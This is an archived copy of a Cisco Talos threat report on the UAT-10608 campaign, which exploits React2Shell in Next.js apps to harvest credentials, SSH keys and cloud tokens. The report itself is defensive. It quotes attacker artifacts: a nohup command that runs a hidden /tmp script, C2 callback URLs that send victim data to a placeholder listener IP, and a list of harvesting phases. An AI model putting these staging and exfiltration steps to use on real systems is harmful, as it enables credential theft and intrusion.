{
	"id": "967377bd-f113-4d44-9c08-24b39cf4d869",
	"created_at": "2026-04-10T03:20:51.571116Z",
	"updated_at": "2026-04-10T03:22:18.547246Z",
	"deleted_at": null,
	"sha1_hash": "06efe49641810a89ea82ae7b25160544fb539362",
	"title": "UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 467106,
	"plain_text": "UAT-10608: Inside a large-scale automated credential harvesting\r\noperation targeting web applications\r\nBy Asheer Malhotra\r\nPublished: 2026-04-02 · Archived: 2026-04-10 02:00:37 UTC\r\nThursday, April 2, 2026 06:00\r\nCisco Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat\r\ncluster we are tracking as “UAT-10608.” \r\nPost-compromise, UAT-10608 leverages automated scripts for extracting and exfiltrating credentials from a\r\nvariety of applications, which are then posted to its command and control (C2). \r\nThe C2 hosts a web-based graphical user interface (GUI) titled “NEXUS Listener” that can be used to view\r\nstolen information and gain analytical insights using precompiled statistics on credentials harvested and\r\nhosts compromised. \r\nTalos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we\r\ncurrently track as UAT-10608. The campaign is primarily leveraging a collection framework dubbed “NEXUS\r\nListener.” The systematic exploitation and exfiltration campaign has resulted in the compromise of at least 766\r\nhosts, as of the time of writing, across multiple geographic regions and cloud providers. The operation is\r\ntargeting Next.js applications vulnerable to React2Shell (CVE-2025-55182) to gain initial access, then\r\ndeploying a multi-phase credential harvesting tool that harvests credentials, SSH keys, cloud tokens, and\r\nenvironment secrets at scale. \r\nThe breadth of the victim set and the indiscriminate targeting pattern are consistent with automated scanning\r\n— likely based on host profile data from services like Shodan, Censys, or custom scanners to enumerate publicly\r\nreachable Next.js deployments and probe them for the described React configuration vulnerabilities. 
\r\nThe core component of the framework is a web application that makes all of the exfiltrated data available to the\r\noperator in a graphical interface that includes in-depth statistics and search capabilities to allow them to sift\r\nthrough the compromised data. \r\nThis post details the campaign's methodology, tools, breadth and sensitivity of the exposed data, and the\r\nimplications for organizations impacted by this activity. \r\nThis analysis is based on data collected for security research purposes. Specific credentials and victim identifiers\r\nhave been withheld from this publication. Talos has informed service providers of exposed and at-risk\r\ncredentials and is working with industry partners such as GitHub and AWS to quarantine credentials and inform\r\nvictims. \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 1 of 9\n\nMetric  Count \r\nCompromised hosts  766 \r\nHosts with database credentials  ~701 (91.5%) \r\nHosts with SSH private keys  ~599 (78.2%) \r\nHosts with AWS credentials  ~196 (25.6%) \r\nHosts with shell command history  ~245 (32.0%) \r\nHosts with live Stripe API keys  ~87 (11.4%) \r\nHosts with GitHub tokens  ~66 (8.6%) \r\n10,120 \r\nInitial access \r\nUAT-10608 targets public-facing web applications using components, predominantly Next.js, that are vulnerable\r\nto CVE-2025-55182, broadly referred to as “React2Shell.” \r\nReact2Shell is a pre-authentication remote code execution (RCE) vulnerability in React Server Components\r\n(RSC). RSCs expose Server Function endpoints that accept serialized data from clients. The affected code\r\ndeserializes payloads from inbound HTTP requests to these endpoints without adequate validation or sanitization. \r\nExploitation steps \r\n1. An attacker identifies a publicly accessible application using a vulnerable version of RSCs or a framework\r\nbuilt on top of it (e.g., Next.js). \r\n2. 
The attacker crafts a malicious serialized payload designed to abuse the deserialization routine — a\r\ntechnique commonly used to trigger arbitrary object instantiation or method invocation on the server. \r\n3. The payload is sent via an HTTP request directly to a Server Function endpoint. No authentication is required. \r\n4. The server deserializes the malicious payload, resulting in arbitrary code execution in the server-side\r\nNode.js process. \r\nOnce the threat actor identifies a vulnerable endpoint, the automated toolkit takes over. No further manual\r\ninteraction is required to extract and exfiltrate credentials harvested from the system. \r\nAutomated harvesting script \r\nData is collected via nohup-executed shell scripts dropped in /tmp with randomized names:\r\n/bin/sh -c nohup sh /tmp/.eba9ee1e4.sh \u003e/dev/null 2\u003e\u00261\r\nThis is consistent with a staged payload delivery model. The initial React exploit delivers a small dropper that\r\nfetches and runs the full multi-phase harvesting script. 
Upon execution, the harvesting script iterates through\r\nseveral phases to collect various data from the compromised system, outlined below: \r\nenviron - Dump running process environment variables  \r\njsenv - Extract JSON-parsed environment from JS runtime  \r\nssh - Harvest SSH private keys and authorized_keys  \r\ntokens - Pattern-match and extract credential strings  \r\nhistory - Capture shell command history  \r\ncloud_meta - Query cloud metadata APIs (AWS/GCP/Azure)  \r\nk8s - Extract Kubernetes service account tokens  \r\ndocker - Enumerate container configurations  \r\ncmdline - List all running process command lines  \r\nproc_all - Aggregate all process environment variables \r\nThe framework leverages a meta.json file that tracks execution state: \r\n Following the completion of each collection phase, an HTTP request is made back to the C2 server running the\r\nNEXUS Listener component. In most cases, the callback takes place on port 8080 and contains the following\r\nparameters: \r\nHostname \r\nPhase \r\nID \r\nSome examples of the full URL, executed after each phase: \r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=info\u0026id=123abc45\r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=jsenv\u0026id=123abc45\r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=k8s\u0026id=123abc45\r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=crontab\u0026id=123abc45\r\nNEXUS Listener \r\nAfter data is exfiltrated from a compromised system and sent back to the C2 infrastructure, it is stored in a\r\ndatabase and made available via a web application called NEXUS Listener. 
In most instances, the web application\r\nfront end is protected with a password, the prompt for which can be seen in Figure 1. \r\nFigure 1. NEXUS Listener Login Prompt.\r\n In at least one instance, the web application was left exposed, revealing a wealth of information, including the\r\ninner workings of the application itself, as well as the data that was harvested from compromised systems. \r\nFigure 2. NEXUS Listener homepage with statistics.\r\nThe application contains a listing of several statistics, including the number of hosts compromised and the total\r\nnumber of each credential type that were successfully extracted from those hosts. It also lists the uptime of the\r\napplication itself. In this case, the automated exploitation and harvesting framework was able to successfully\r\ncompromise 766 hosts within a 24-hour period. \r\nFigure 3. NEXUS Listener victims list.\r\nThe web application allows a user to browse through all of the compromised hosts. A given host can then be\r\nselected, bringing up a menu with all of the exfiltrated data corresponding to each phase of the harvesting script. \r\nFigure 4. NEXUS Listener individual victim credentials.\r\nThe observed NEXUS Listener instances display “v3” in the title, indicating the application has gone through\r\nvarious stages of development before reaching the currently deployed version.\r\nAnalysis \r\nCisco Talos was able to obtain data from an unauthenticated NEXUS Listener instance. The following is an\r\nanalysis of that data, broken down by credential category. 
\r\nCredential Categories \r\nEnvironment secrets and API keys \r\nThe “environ.txt” and “jsenv.txt” files contain the runtime environment of each compromised application process,\r\nexposing a variety of third-party API credentials: \r\nAI platform keys: OpenAI, Anthropic, NVIDIA NIM, OpenRouter, Tavily \r\nPayment processors: Stripe live secret keys (sk_live_*) \r\nCloud providers: AWS access key/secret pairs, Azure subscription credentials \r\nCommunication platforms: SendGrid, Brevo/Sendinblue transactional email API keys, Telegram bot tokens\r\nand webhook secrets \r\nSource control: GitHub personal access tokens, GitLab tokens \r\nDatabase connection strings: Full DATABASE_URL values including hostnames, ports, usernames, and\r\ncleartext passwords \r\nCustom application secrets: Auth tokens, dashboard passwords, webhook signing secrets — often high-entropy hex or Base64 strings \r\nSSH private keys \r\nPresent in 78% of hosts, the “ssh.txt” files contain complete PEM-encoded private keys (both ED25519 and RSA\r\nformats) along with authorized_keys entries. These keys enable lateral movement to any other system that trusts\r\nthe compromised host's key identity — a particularly severe finding for organizations with shared key\r\ninfrastructure or bastion-host architectures. \r\nCloud credential harvesting \r\nThe “aws_full.txt” and “cloud_meta.txt” phases attempt to query the AWS Instance Metadata Service (IMDS),\r\nGCP metadata server, and Azure IMDS. For cloud-hosted targets, successful retrieval yields IAM role-associated\r\ntemporary credentials — credentials that carry whatever permissions were granted to the instance role, which in\r\nmisconfigured environments can include S3 bucket access, EC2 control plane operations, or secrets manager read\r\naccess. 
\r\nKubernetes service account tokens \r\nThe “k8s.txt” phase targets containerized workloads, attempting to read the default service account token mounted\r\nat /var/run/secrets/kubernetes.io/serviceaccount/token. A compromised Kubernetes token can allow an attacker\r\nto enumerate cluster resources, read secrets from other namespaces, or escalate to cluster-admin depending on\r\nRBAC configuration. \r\nDocker container intelligence \r\nFor hosts running Docker (approximately 6% of the dataset), the “docker.txt” phase enumerates all running\r\ncontainers, their images, exposed ports, network configurations, mount points, and environment variables. Notable\r\nservices observed include phpMyAdmin instances, n8n workflow automation, and internal administrative\r\ndashboards — all of which are high-value targets for follow-on access. \r\nShell command history \r\nCommand history files reveal operator behavior on compromised systems and other information that could be\r\nuseful for post-compromise activity. Observed patterns include: \r\nMySQL client invocations with explicit credentials: mysql -u root -p \r\nDatabase service management: /etc/init.d/mysqld restart\r\nImplications \r\nCredential compromise and account takeover: Every credential in this dataset should be considered\r\nfully compromised. Live Stripe secret keys enable fraudulent charges and refund manipulation. AWS keys\r\nwith broad IAM permissions enable cloud infrastructure takeover, data exfiltration from S3, and lateral\r\nmovement within AWS organizations. Database connection strings with cleartext passwords provide direct\r\naccess to application data stores containing user personally identifiable information (PII), financial records,\r\nor proprietary data. \r\nLateral movement via SSH: The large corpus of exposed SSH private keys creates a persistent lateral\r\nmovement risk that survives the rotation of application credentials. 
If any of these keys are reused across\r\nsystems (a common operational practice), the attacker retains access to those systems even after\r\nthe initial compromise is detected and remediated. \r\nSupply chain risk: Several hosts show evidence of package registry authentication files (“pkgauth.txt”),\r\nincluding npm and pip configuration with registry credentials. Compromised package registry tokens could\r\nenable a supply chain attack — publishing malicious versions of packages under a legitimate maintainer's\r\nidentity. \r\nData aggregation and intelligence value: Beyond the immediate operational value of individual\r\ncredentials, the aggregate dataset represents a detailed map of the victim organizations' infrastructure: what\r\nservices they run, how they're configured, what cloud providers they use, and what third-party integrations\r\nare in place. This intelligence has significant value for crafting targeted follow-on attacks, social\r\nengineering campaigns, or selling access to other threat actors. \r\nReputational and regulatory exposure: For any organization whose data appears in this set, there are\r\nserious compliance implications. Database credentials exposing PII trigger breach notification\r\nrequirements under GDPR, CCPA, and sector-specific regulations. Organizations that process payments\r\nwhose Stripe keys are exposed face PCI DSS incident response obligations. The exposure of AI platform\r\nAPI keys can result in significant unauthorized usage charges in addition to the security risk. \r\nRecommendations \r\n1. Audit getServerSideProps and getStaticProps implementations: Ensure no secrets or server-only\r\nenvironment variables are passed as props to client components. \r\n2. Enforce NEXT_PUBLIC_ prefix discipline: Only variables that are intentionally public should carry this\r\nprefix. 
Audit all variables for misclassification. \r\n3. Rotate all credentials immediately if any overlap with the described victim profile is suspected. \r\n4. Implement IMDSv2 enforcement on all AWS EC2 instances to require session-oriented metadata queries,\r\nblocking unauthenticated metadata service abuse. \r\n5. Segment SSH keys: Avoid reusing SSH key pairs across different systems or environments. \r\n6. Enable cloud provider secret scanning: AWS, GitHub, and others offer native secret scanning that can\r\ndetect and alert on committed or exposed credentials. \r\n7. Deploy runtime application self-protection (RASP) or a WAF rule set tuned for Next.js-specific attack\r\npatterns, particularly those targeting SSR data injection points. \r\n8. Audit container environments for least-privilege. Application containers should not have access to the\r\nhost SSH agent, host filesystem mounts containing sensitive data, or overly permissive IAM instance\r\nroles. \r\nCoverage \r\nSNORT® ID for CVE-2025-55182, aka React2Shell: 65554 \r\nIndicators of compromise (IOCs) \r\nOrganizations should investigate for the following artifacts on web application hosts: \r\nUnexpected processes spawned from /tmp/ with randomized dot-prefixed names (e.g., /tmp/.e40e7da0c.sh) \r\nnohup invocations in process listings not associated with known application workflows \r\nUnusual outbound HTTP/S connections from application containers to non-production endpoints \r\nEvidence of __NEXT_DATA__ containing server-side secrets in rendered HTML \r\nIOCs for this threat are also available on our GitHub repository.\r\n144[.]172[.]102[.]88\r\n172[.]86[.]127[.]128\r\n144[.]172[.]112[.]136\r\n144[.]172[.]117[.]112\r\nSource: 
https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/"
	],
	"report_names": [
		"uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications"
	],
	"threat_actors": [],
	"ts_created_at": 1775791251,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/06efe49641810a89ea82ae7b25160544fb539362.pdf",
		"text": "https://archive.orkl.eu/06efe49641810a89ea82ae7b25160544fb539362.txt",
		"img": "https://archive.orkl.eu/06efe49641810a89ea82ae7b25160544fb539362.jpg"
	}
}